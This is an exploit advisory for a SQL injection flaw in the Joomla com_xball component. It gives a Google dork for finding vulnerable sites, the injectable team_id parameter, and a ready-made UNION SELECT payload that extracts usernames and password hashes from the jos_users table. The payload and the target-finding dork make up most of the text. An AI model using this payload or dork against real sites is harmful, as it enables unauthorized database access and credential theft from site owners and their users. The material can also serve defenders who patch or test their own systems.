######################################################################################################
#  Exploit Title : Joomla Component (com_xball) SQL Injection Vulnerability
#
#  Author        : CoBRa_21
#
#  E-Mail        : uyku_cu [at] windowslive.com
#
#  My Team       : Lojistik ALLSTAR  (cyber-warrior.org)
#
#  Google Dork   : inurl:index.php?option=com_xball
#
#  Status        : High-Risk
######################################################################################################
#
#  SQL Vulnerability
#
#  http://127.0.0.1/[PATH]/index.php?option=com_xball&controller=teams&task=show&team_id=-98 (SQL)
#
#  SQL EXPLOIT
#
#  +union+select+0,1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users
#
######################################################################################################
#                                    ( Vulnerability Researcher )
######################################################################################################